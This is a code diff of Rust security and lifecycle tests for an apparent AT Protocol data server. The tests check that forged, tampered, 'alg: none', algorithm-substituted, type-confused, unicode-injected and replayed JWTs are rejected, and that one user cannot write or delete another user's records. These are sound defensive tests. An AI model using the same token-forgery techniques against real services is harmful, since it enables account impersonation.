mod common;
3
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
use chrono::{Duration, Utc};
5
use common::{base_url, client, create_account_and_login, get_db_connection_string};
6
use k256::SecretKey;
···
9
use reqwest::StatusCode;
10
use serde_json::{Value, json};
11
use sha2::{Digest, Sha256};
12
+
use tranquil_pds::auth::{
13
+
self, SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH,
14
+
TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, create_access_token,
15
+
create_refresh_token, create_service_token, get_did_from_token, get_jti_from_token,
16
+
verify_access_token, verify_refresh_token, verify_token,
17
+
};
18
19
fn generate_user_key() -> Vec<u8> {
20
let secret_key = SecretKey::random(&mut OsRng);
···
48
let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature);
49
let result = verify_access_token(&forged_token, &key_bytes);
50
assert!(result.is_err(), "Forged signature must be rejected");
51
+
assert!(
52
+
result
53
+
.err()
54
+
.unwrap()
55
+
.to_string()
56
+
.to_lowercase()
57
+
.contains("signature")
58
+
);
59
60
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
61
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
62
payload["sub"] = json!("did:plc:attacker");
63
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
64
let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
65
+
assert!(
66
+
verify_access_token(&modified_token, &key_bytes).is_err(),
67
+
"Modified payload must be rejected"
68
+
);
69
70
let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
71
let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]);
72
let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig);
73
+
assert!(
74
+
verify_access_token(&truncated_token, &key_bytes).is_err(),
75
+
"Truncated signature must be rejected"
76
+
);
77
78
let mut extended_sig = sig_bytes.clone();
79
extended_sig.extend_from_slice(&[0u8; 32]);
80
+
let extended_token = format!(
81
+
"{}.{}.{}",
82
+
parts[0],
83
+
parts[1],
84
+
URL_SAFE_NO_PAD.encode(&extended_sig)
85
+
);
86
+
assert!(
87
+
verify_access_token(&extended_token, &key_bytes).is_err(),
88
+
"Extended signature must be rejected"
89
+
);
90
91
let key_bytes_user2 = generate_user_key();
92
+
assert!(
93
+
verify_access_token(&token, &key_bytes_user2).is_err(),
94
+
"Token signed with different key must be rejected"
95
+
);
96
}
97
98
#[test]
···
107
"jti": "attack-token", "scope": SCOPE_ACCESS
108
});
109
let none_token = create_unsigned_jwt(&none_header, &claims);
110
+
assert!(
111
+
verify_access_token(&none_token, &key_bytes).is_err(),
112
+
"Algorithm 'none' must be rejected"
113
+
);
114
115
let hs256_header = json!({ "alg": "HS256", "typ": TOKEN_TYPE_ACCESS });
116
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&hs256_header).unwrap());
···
122
mac.update(message.as_bytes());
123
let hmac_sig = mac.finalize().into_bytes();
124
let hs256_token = format!("{}.{}", message, URL_SAFE_NO_PAD.encode(&hmac_sig));
125
+
assert!(
126
+
verify_access_token(&hs256_token, &key_bytes).is_err(),
127
+
"HS256 substitution must be rejected"
128
+
);
129
130
for (alg, sig_len) in [("RS256", 256), ("ES256", 64)] {
131
let header = json!({ "alg": alg, "typ": TOKEN_TYPE_ACCESS });
132
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
133
let fake_sig = URL_SAFE_NO_PAD.encode(&vec![1u8; sig_len]);
134
let token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
135
+
assert!(
136
+
verify_access_token(&token, &key_bytes).is_err(),
137
+
"{} substitution must be rejected",
138
+
alg
139
+
);
140
}
141
}
142
···
148
let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token");
149
let result = verify_access_token(&refresh_token, &key_bytes);
150
assert!(result.is_err(), "Refresh token as access must be rejected");
151
+
assert!(
152
+
result
153
+
.err()
154
+
.unwrap()
155
+
.to_string()
156
+
.contains("Invalid token type")
157
+
);
158
159
let access_token = create_access_token(did, &key_bytes).expect("create access token");
160
let result = verify_refresh_token(&access_token, &key_bytes);
161
assert!(result.is_err(), "Access token as refresh must be rejected");
162
+
assert!(
163
+
result
164
+
.err()
165
+
.unwrap()
166
+
.to_string()
167
+
.contains("Invalid token type")
168
+
);
169
170
+
let service_token =
171
+
create_service_token(did, "did:web:target", "com.example.method", &key_bytes).unwrap();
172
+
assert!(
173
+
verify_access_token(&service_token, &key_bytes).is_err(),
174
+
"Service token as access must be rejected"
175
+
);
176
}
177
178
#[test]
···
186
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
187
"jti": "test", "scope": "admin.all"
188
});
189
+
let result = verify_access_token(
190
+
&create_custom_jwt(&header, &invalid_scope, &key_bytes),
191
+
&key_bytes,
192
+
);
193
+
assert!(
194
+
result.is_err()
195
+
&& result
196
+
.err()
197
+
.unwrap()
198
+
.to_string()
199
+
.contains("Invalid token scope")
200
+
);
201
202
let empty_scope = json!({
203
"iss": did, "sub": did, "aud": "did:web:test.pds",
204
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
205
"jti": "test", "scope": ""
206
});
207
+
assert!(
208
+
verify_access_token(
209
+
&create_custom_jwt(&header, &empty_scope, &key_bytes),
210
+
&key_bytes
211
+
)
212
+
.is_err()
213
+
);
214
215
let missing_scope = json!({
216
"iss": did, "sub": did, "aud": "did:web:test.pds",
217
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
218
"jti": "test"
219
});
220
+
assert!(
221
+
verify_access_token(
222
+
&create_custom_jwt(&header, &missing_scope, &key_bytes),
223
+
&key_bytes
224
+
)
225
+
.is_err()
226
+
);
227
228
for scope in [SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED] {
229
let claims = json!({
···
231
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
232
"jti": "test", "scope": scope
233
});
234
+
assert!(
235
+
verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes)
236
+
.is_ok()
237
+
);
238
}
239
240
let refresh_scope = json!({
···
242
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
243
"jti": "test", "scope": SCOPE_REFRESH
244
});
245
+
assert!(
246
+
verify_access_token(
247
+
&create_custom_jwt(&header, &refresh_scope, &key_bytes),
248
+
&key_bytes
249
+
)
250
+
.is_err()
251
+
);
252
}
253
254
#[test]
···
262
"iss": did, "sub": did, "aud": "did:web:test.pds",
263
"iat": now - 7200, "exp": now - 3600, "jti": "test", "scope": SCOPE_ACCESS
264
});
265
+
let result = verify_access_token(
266
+
&create_custom_jwt(&header, &expired, &key_bytes),
267
+
&key_bytes,
268
+
);
269
assert!(result.is_err() && result.err().unwrap().to_string().contains("expired"));
270
271
let future_iat = json!({
272
"iss": did, "sub": did, "aud": "did:web:test.pds",
273
"iat": now + 60, "exp": now + 7200, "jti": "test", "scope": SCOPE_ACCESS
274
});
275
+
assert!(
276
+
verify_access_token(
277
+
&create_custom_jwt(&header, &future_iat, &key_bytes),
278
+
&key_bytes
279
+
)
280
+
.is_ok()
281
+
);
282
283
let just_expired = json!({
284
"iss": did, "sub": did, "aud": "did:web:test.pds",
285
"iat": now - 10, "exp": now - 1, "jti": "test", "scope": SCOPE_ACCESS
286
});
287
+
assert!(
288
+
verify_access_token(
289
+
&create_custom_jwt(&header, &just_expired, &key_bytes),
290
+
&key_bytes
291
+
)
292
+
.is_err()
293
+
);
294
295
let far_future = json!({
296
"iss": did, "sub": did, "aud": "did:web:test.pds",
297
"iat": now, "exp": i64::MAX, "jti": "test", "scope": SCOPE_ACCESS
298
});
299
+
let _ = verify_access_token(
300
+
&create_custom_jwt(&header, &far_future, &key_bytes),
301
+
&key_bytes,
302
+
);
303
304
let negative_iat = json!({
305
"iss": did, "sub": did, "aud": "did:web:test.pds",
306
"iat": -1000000000i64, "exp": now + 3600, "jti": "test", "scope": SCOPE_ACCESS
307
});
308
+
let _ = verify_access_token(
309
+
&create_custom_jwt(&header, &negative_iat, &key_bytes),
310
+
&key_bytes,
311
+
);
312
}
313
314
#[test]
315
fn test_malformed_tokens() {
316
let key_bytes = generate_user_key();
317
318
+
for token in [
319
+
"",
320
+
"not-a-token",
321
+
"one.two",
322
+
"one.two.three.four",
323
+
"....",
324
+
"eyJhbGciOiJFUzI1NksifQ",
325
+
"eyJhbGciOiJFUzI1NksifQ.",
326
+
"eyJhbGciOiJFUzI1NksifQ..",
327
+
".eyJzdWIiOiJ0ZXN0In0.",
328
+
"!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig",
329
+
] {
330
+
assert!(
331
+
verify_access_token(token, &key_bytes).is_err(),
332
+
"Malformed token must be rejected"
333
+
);
334
}
335
336
let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}");
337
let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#);
338
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]);
339
+
assert!(
340
+
verify_access_token(
341
+
&format!("{}.{}.{}", invalid_header, claims_b64, fake_sig),
342
+
&key_bytes
343
+
)
344
+
.is_err()
345
+
);
346
347
let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#);
348
let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}");
349
+
assert!(
350
+
verify_access_token(
351
+
&format!("{}.{}.{}", header_b64, invalid_claims, fake_sig),
352
+
&key_bytes
353
+
)
354
+
.is_err()
355
+
);
356
}
357
358
#[test]
···
365
"iss": did, "sub": did, "aud": "did:web:test",
366
"iat": Utc::now().timestamp(), "scope": SCOPE_ACCESS
367
});
368
+
assert!(
369
+
verify_access_token(
370
+
&create_custom_jwt(&header, &missing_exp, &key_bytes),
371
+
&key_bytes
372
+
)
373
+
.is_err()
374
+
);
375
376
let missing_iat = json!({
377
"iss": did, "sub": did, "aud": "did:web:test",
378
"exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS
379
});
380
+
assert!(
381
+
verify_access_token(
382
+
&create_custom_jwt(&header, &missing_iat, &key_bytes),
383
+
&key_bytes
384
+
)
385
+
.is_err()
386
+
);
387
388
let missing_sub = json!({
389
"iss": did, "aud": "did:web:test",
390
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS
391
});
392
+
assert!(
393
+
verify_access_token(
394
+
&create_custom_jwt(&header, &missing_sub, &key_bytes),
395
+
&key_bytes
396
+
)
397
+
.is_err()
398
+
);
399
400
let wrong_types = json!({
401
"iss": 12345, "sub": ["did:plc:test"], "aud": {"url": "did:web:test"},
402
"iat": "not a number", "exp": "also not a number", "jti": null, "scope": SCOPE_ACCESS
403
});
404
+
assert!(
405
+
verify_access_token(
406
+
&create_custom_jwt(&header, &wrong_types, &key_bytes),
407
+
&key_bytes
408
+
)
409
+
.is_err()
410
+
);
411
412
let unicode_injection = json!({
413
"iss": "did:plc:test\u{0000}attacker", "sub": "did:plc:test\u{202E}rekatta",
414
"aud": "did:web:test.pds", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
415
"jti": "test", "scope": SCOPE_ACCESS
416
});
417
+
if let Ok(data) = verify_access_token(
418
+
&create_custom_jwt(&header, &unicode_injection, &key_bytes),
419
+
&key_bytes,
420
+
) {
421
assert!(!data.claims.sub.contains('\0'));
422
}
423
}
···
461
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
462
"jti": "test", "scope": SCOPE_ACCESS
463
});
464
+
assert!(
465
+
verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok()
466
+
);
467
468
let valid_token = create_access_token(did, &key_bytes).expect("create token");
469
let parts: Vec<&str> = valid_token.split('.').collect();
470
let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
471
almost_valid[0] ^= 1;
472
+
let almost_valid_token = format!(
473
+
"{}.{}.{}",
474
+
parts[0],
475
+
parts[1],
476
+
URL_SAFE_NO_PAD.encode(&almost_valid)
477
+
);
478
+
let completely_invalid_token = format!(
479
+
"{}.{}.{}",
480
+
parts[0],
481
+
parts[1],
482
+
URL_SAFE_NO_PAD.encode(&[0xFFu8; 64])
483
+
);
484
let _ = verify_access_token(&almost_valid_token, &key_bytes);
485
let _ = verify_access_token(&completely_invalid_token, &key_bytes);
486
}
···
492
493
let key_bytes = generate_user_key();
494
let forged_token = create_access_token("did:plc:fake-user", &key_bytes).unwrap();
495
+
let res = http_client
496
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
497
.header("Authorization", format!("Bearer {}", forged_token))
498
+
.send()
499
+
.await
500
+
.unwrap();
501
+
assert_eq!(
502
+
res.status(),
503
+
StatusCode::UNAUTHORIZED,
504
+
"Forged token must be rejected"
505
+
);
506
507
let (access_jwt, _did) = create_account_and_login(&http_client).await;
508
let parts: Vec<&str> = access_jwt.split('.').collect();
···
510
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
511
512
payload["exp"] = json!(Utc::now().timestamp() - 3600);
513
+
let expired_token = format!(
514
+
"{}.{}.{}",
515
+
parts[0],
516
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()),
517
+
parts[2]
518
+
);
519
+
let res = http_client
520
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
521
.header("Authorization", format!("Bearer {}", expired_token))
522
+
.send()
523
+
.await
524
+
.unwrap();
525
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
526
527
let mut tampered_payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
528
tampered_payload["sub"] = json!("did:plc:attacker");
529
tampered_payload["iss"] = json!("did:plc:attacker");
530
+
let tampered_token = format!(
531
+
"{}.{}.{}",
532
+
parts[0],
533
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&tampered_payload).unwrap()),
534
+
parts[2]
535
+
);
536
+
let res = http_client
537
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
538
.header("Authorization", format!("Bearer {}", tampered_token))
539
+
.send()
540
+
.await
541
+
.unwrap();
542
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
543
}
544
···
548
let http_client = client();
549
let (access_jwt, _did) = create_account_and_login(&http_client).await;
550
551
+
let res = http_client
552
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
553
.header("Authorization", format!("Bearer {}", access_jwt))
554
+
.send()
555
+
.await
556
+
.unwrap();
557
assert_eq!(res.status(), StatusCode::OK);
558
559
+
let res = http_client
560
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
561
.header("Authorization", format!("bearer {}", access_jwt))
562
+
.send()
563
+
.await
564
+
.unwrap();
565
assert_eq!(res.status(), StatusCode::OK);
566
567
+
let res = http_client
568
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
569
.header("Authorization", format!("Basic {}", access_jwt))
570
+
.send()
571
+
.await
572
+
.unwrap();
573
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
574
575
+
let res = http_client
576
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
577
.header("Authorization", &access_jwt)
578
+
.send()
579
+
.await
580
+
.unwrap();
581
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
582
583
+
let res = http_client
584
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
585
.header("Authorization", "Bearer ")
586
+
.send()
587
+
.await
588
+
.unwrap();
589
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
590
}
591
···
595
let http_client = client();
596
let (access_jwt, _did) = create_account_and_login(&http_client).await;
597
598
+
let res = http_client
599
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
600
.header("Authorization", format!("Bearer {}", access_jwt))
601
+
.send()
602
+
.await
603
+
.unwrap();
604
assert_eq!(res.status(), StatusCode::OK);
605
606
+
let logout = http_client
607
+
.post(format!("{}/xrpc/com.atproto.server.deleteSession", url))
608
.header("Authorization", format!("Bearer {}", access_jwt))
609
+
.send()
610
+
.await
611
+
.unwrap();
612
assert_eq!(logout.status(), StatusCode::OK);
613
614
+
let res = http_client
615
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
616
.header("Authorization", format!("Bearer {}", access_jwt))
617
+
.send()
618
+
.await
619
+
.unwrap();
620
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
621
}
622
···
626
let http_client = client();
627
let (access_jwt, _did) = create_account_and_login(&http_client).await;
628
629
+
let deact = http_client
630
+
.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url))
631
.header("Authorization", format!("Bearer {}", access_jwt))
632
.json(&json!({}))
633
+
.send()
634
+
.await
635
+
.unwrap();
636
assert_eq!(deact.status(), StatusCode::OK);
637
638
+
let res = http_client
639
+
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
640
.header("Authorization", format!("Bearer {}", access_jwt))
641
+
.send()
642
+
.await
643
+
.unwrap();
644
assert_eq!(res.status(), StatusCode::OK);
645
let body: Value = res.json().await.unwrap();
646
assert_eq!(body["active"], false);
647
648
+
let post_res = http_client
649
+
.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
650
.header("Authorization", format!("Bearer {}", access_jwt))
651
.json(&json!({
652
"repo": _did,
···
657
"createdAt": "2024-01-01T00:00:00Z"
658
}
659
}))
660
+
.send()
661
+
.await
662
+
.unwrap();
663
assert_eq!(post_res.status(), StatusCode::UNAUTHORIZED);
664
let post_body: Value = post_res.json().await.unwrap();
665
assert_eq!(post_body["error"], "AccountDeactivated");
···
673
let handle = format!("rt-replay-jwt-{}", ts);
674
let email = format!("rt-replay-jwt-{}@example.com", ts);
675
676
+
let create_res = http_client
677
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
678
.json(&json!({ "handle": handle, "email": email, "password": "test-password-123" }))
679
+
.send()
680
+
.await
681
+
.unwrap();
682
assert_eq!(create_res.status(), StatusCode::OK);
683
let account: Value = create_res.json().await.unwrap();
684
let did = account["did"].as_str().unwrap();
···
686
let pool = sqlx::postgres::PgPoolOptions::new()
687
.max_connections(2)
688
.connect(&get_db_connection_string().await)
689
+
.await
690
+
.unwrap();
691
let code: String = sqlx::query_scalar!(
692
"SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'",
693
did
694
).fetch_one(&pool).await.unwrap();
695
696
+
let confirm = http_client
697
+
.post(format!("{}/xrpc/com.atproto.server.confirmSignup", url))
698
.json(&json!({ "did": did, "verificationCode": code }))
699
+
.send()
700
+
.await
701
+
.unwrap();
702
assert_eq!(confirm.status(), StatusCode::OK);
703
let confirmed: Value = confirm.json().await.unwrap();
704
let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string();
705
706
+
let first = http_client
707
+
.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
708
.header("Authorization", format!("Bearer {}", refresh_jwt))
709
+
.send()
710
+
.await
711
+
.unwrap();
712
assert_eq!(first.status(), StatusCode::OK);
713
714
+
let replay = http_client
715
+
.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
716
.header("Authorization", format!("Bearer {}", refresh_jwt))
717
+
.send()
718
+
.await
719
+
.unwrap();
720
assert_eq!(replay.status(), StatusCode::UNAUTHORIZED);
721
}
+413
-101
tests/lifecycle_record.rs
+413
-101
tests/lifecycle_record.rs
···
26
}
27
});
28
let create_res = client
29
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
30
.bearer_auth(&jwt)
31
.json(&create_payload)
32
.send()
33
.await
34
.expect("Failed to send create request");
35
-
assert_eq!(create_res.status(), StatusCode::OK, "Failed to create record");
36
-
let create_body: Value = create_res.json().await.expect("create response was not JSON");
37
let uri = create_body["uri"].as_str().unwrap();
38
let initial_cid = create_body["cid"].as_str().unwrap().to_string();
39
-
let params = [("repo", did.as_str()), ("collection", collection), ("rkey", &rkey)];
40
let get_res = client
41
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
42
.query(¶ms)
43
.send()
44
.await
45
.expect("Failed to send get request");
46
-
assert_eq!(get_res.status(), StatusCode::OK, "Failed to get record after create");
47
let get_body: Value = get_res.json().await.expect("get response was not JSON");
48
assert_eq!(get_body["uri"], uri);
49
assert_eq!(get_body["value"]["text"], original_text);
···
56
"swapRecord": initial_cid
57
});
58
let update_res = client
59
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
60
.bearer_auth(&jwt)
61
.json(&update_payload)
62
.send()
63
.await
64
.expect("Failed to send update request");
65
-
assert_eq!(update_res.status(), StatusCode::OK, "Failed to update record");
66
-
let update_body: Value = update_res.json().await.expect("update response was not JSON");
67
let updated_cid = update_body["cid"].as_str().unwrap().to_string();
68
let get_updated_res = client
69
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
70
.query(¶ms)
71
.send()
72
.await
73
.expect("Failed to send get-after-update request");
74
-
let get_updated_body: Value = get_updated_res.json().await.expect("get-updated response was not JSON");
75
-
assert_eq!(get_updated_body["value"]["text"], updated_text, "Text was not updated");
76
let stale_update_payload = json!({
77
"repo": did,
78
"collection": collection,
···
81
"swapRecord": initial_cid
82
});
83
let stale_res = client
84
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
85
.bearer_auth(&jwt)
86
.json(&stale_update_payload)
87
.send()
88
.await
89
.expect("Failed to send stale update");
90
-
assert_eq!(stale_res.status(), StatusCode::CONFLICT, "Stale update should cause 409");
91
let good_update_payload = json!({
92
"repo": did,
93
"collection": collection,
···
96
"swapRecord": updated_cid
97
});
98
let good_res = client
99
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
100
.bearer_auth(&jwt)
101
.json(&good_update_payload)
102
.send()
103
.await
104
.expect("Failed to send good update");
105
-
assert_eq!(good_res.status(), StatusCode::OK, "Good update should succeed");
106
let delete_payload = json!({ "repo": did, "collection": collection, "rkey": rkey });
107
let delete_res = client
108
-
.post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await))
109
.bearer_auth(&jwt)
110
.json(&delete_payload)
111
.send()
112
.await
113
.expect("Failed to send delete request");
114
-
assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete record");
115
let get_deleted_res = client
116
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
117
.query(¶ms)
118
.send()
119
.await
120
.expect("Failed to send get-after-delete request");
121
-
assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Record should be deleted");
122
}
123
124
#[tokio::test]
···
127
let (did, jwt) = setup_new_user("profile-blob").await;
128
let blob_data = b"This is test blob data for a profile avatar";
129
let upload_res = client
130
-
.post(format!("{}/xrpc/com.atproto.repo.uploadBlob", base_url().await))
131
.header(header::CONTENT_TYPE, "text/plain")
132
.bearer_auth(&jwt)
133
.body(blob_data.to_vec())
···
149
}
150
});
151
let create_res = client
152
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
153
.bearer_auth(&jwt)
154
.json(&profile_payload)
155
.send()
156
.await
157
.expect("Failed to create profile");
158
-
assert_eq!(create_res.status(), StatusCode::OK, "Failed to create profile");
159
let create_body: Value = create_res.json().await.unwrap();
160
let initial_cid = create_body["cid"].as_str().unwrap().to_string();
161
let get_res = client
162
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
163
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")])
164
.send()
165
.await
166
.expect("Failed to get profile");
···
176
"swapRecord": initial_cid
177
});
178
let update_res = client
179
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
180
.bearer_auth(&jwt)
181
.json(&update_payload)
182
.send()
183
.await
184
.expect("Failed to update profile");
185
-
assert_eq!(update_res.status(), StatusCode::OK, "Failed to update profile");
186
let get_updated_res = client
187
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
188
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")])
189
.send()
190
.await
191
.expect("Failed to get updated profile");
···
198
let client = client();
199
let (alice_did, alice_jwt) = setup_new_user("alice-thread").await;
200
let (bob_did, bob_jwt) = setup_new_user("bob-thread").await;
201
-
let (root_uri, root_cid) = create_post(&client, &alice_did, &alice_jwt, "This is the root post").await;
202
tokio::time::sleep(Duration::from_millis(100)).await;
203
let reply_collection = "app.bsky.feed.post";
204
let reply_rkey = format!("e2e_reply_{}", Utc::now().timestamp_millis());
···
217
}
218
});
219
let reply_res = client
220
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
221
.bearer_auth(&bob_jwt)
222
.json(&reply_payload)
223
.send()
···
228
let reply_uri = reply_body["uri"].as_str().unwrap();
229
let reply_cid = reply_body["cid"].as_str().unwrap();
230
let get_reply_res = client
231
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
232
-
.query(&[("repo", bob_did.as_str()), ("collection", reply_collection), ("rkey", reply_rkey.as_str())])
233
.send()
234
.await
235
.expect("Failed to get reply");
···
253
}
254
});
255
let nested_res = client
256
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
257
.bearer_auth(&alice_jwt)
258
.json(&nested_payload)
259
.send()
260
.await
261
.expect("Failed to create nested reply");
262
-
assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply");
263
}
264
265
#[tokio::test]
···
276
"record": { "$type": "app.bsky.feed.post", "text": "Bob trying to post as Alice", "createdAt": Utc::now().to_rfc3339() }
277
});
278
let write_res = client
279
-
.post(format!("{}/xrpc/com.atproto.repo.putRecord", base_url().await))
280
.bearer_auth(&bob_jwt)
281
.json(&post_payload)
282
.send()
283
.await
284
.expect("Failed to send request");
285
-
assert!(write_res.status() == StatusCode::FORBIDDEN || write_res.status() == StatusCode::UNAUTHORIZED,
286
-
"Expected 403/401 for writing to another user's repo, got {}", write_res.status());
287
-
let delete_payload = json!({ "repo": alice_did, "collection": "app.bsky.feed.post", "rkey": post_rkey });
288
let delete_res = client
289
-
.post(format!("{}/xrpc/com.atproto.repo.deleteRecord", base_url().await))
290
.bearer_auth(&bob_jwt)
291
.json(&delete_payload)
292
.send()
293
.await
294
.expect("Failed to send request");
295
-
assert!(delete_res.status() == StatusCode::FORBIDDEN || delete_res.status() == StatusCode::UNAUTHORIZED,
296
-
"Expected 403/401 for deleting another user's record, got {}", delete_res.status());
297
let get_res = client
298
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
299
-
.query(&[("repo", alice_did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", post_rkey)])
300
.send()
301
.await
302
.expect("Failed to verify record exists");
303
-
assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist");
304
}
305
306
#[tokio::test]
···
317
]
318
});
319
let apply_res = client
320
-
.post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await))
321
.bearer_auth(&jwt)
322
.json(&writes_payload)
323
.send()
···
325
.expect("Failed to apply writes");
326
assert_eq!(apply_res.status(), StatusCode::OK);
327
let get_post1 = client
328
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
329
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")])
330
-
.send().await.expect("Failed to get post 1");
331
assert_eq!(get_post1.status(), StatusCode::OK);
332
let post1_body: Value = get_post1.json().await.unwrap();
333
assert_eq!(post1_body["value"]["text"], "First batch post");
334
let get_post2 = client
335
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
336
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-2")])
337
-
.send().await.expect("Failed to get post 2");
338
assert_eq!(get_post2.status(), StatusCode::OK);
339
let get_profile = client
340
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
341
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")])
342
-
.send().await.expect("Failed to get profile");
343
let profile_body: Value = get_profile.json().await.unwrap();
344
assert_eq!(profile_body["value"]["displayName"], "Batch User");
345
let update_writes = json!({
···
350
]
351
});
352
let update_res = client
353
-
.post(format!("{}/xrpc/com.atproto.repo.applyWrites", base_url().await))
354
.bearer_auth(&jwt)
355
.json(&update_writes)
356
.send()
···
358
.expect("Failed to apply update writes");
359
assert_eq!(update_res.status(), StatusCode::OK);
360
let get_updated_profile = client
361
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
362
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.actor.profile"), ("rkey", "self")])
363
-
.send().await.expect("Failed to get updated profile");
364
let updated_profile: Value = get_updated_profile.json().await.unwrap();
365
-
assert_eq!(updated_profile["value"]["displayName"], "Updated Batch User");
366
let get_deleted_post = client
367
-
.get(format!("{}/xrpc/com.atproto.repo.getRecord", base_url().await))
368
-
.query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post"), ("rkey", "batch-post-1")])
369
-
.send().await.expect("Failed to check deleted post");
370
-
assert_eq!(get_deleted_post.status(), StatusCode::NOT_FOUND, "Batch-deleted post should be gone");
371
}
372
373
-
async fn create_post_with_rkey(client: &reqwest::Client, did: &str, jwt: &str, rkey: &str, text: &str) -> (String, String) {
374
let payload = json!({
375
"repo": did, "collection": "app.bsky.feed.post", "rkey": rkey,
376
"record": { "$type": "app.bsky.feed.post", "text": text, "createdAt": Utc::now().to_rfc3339() }
377
});
378
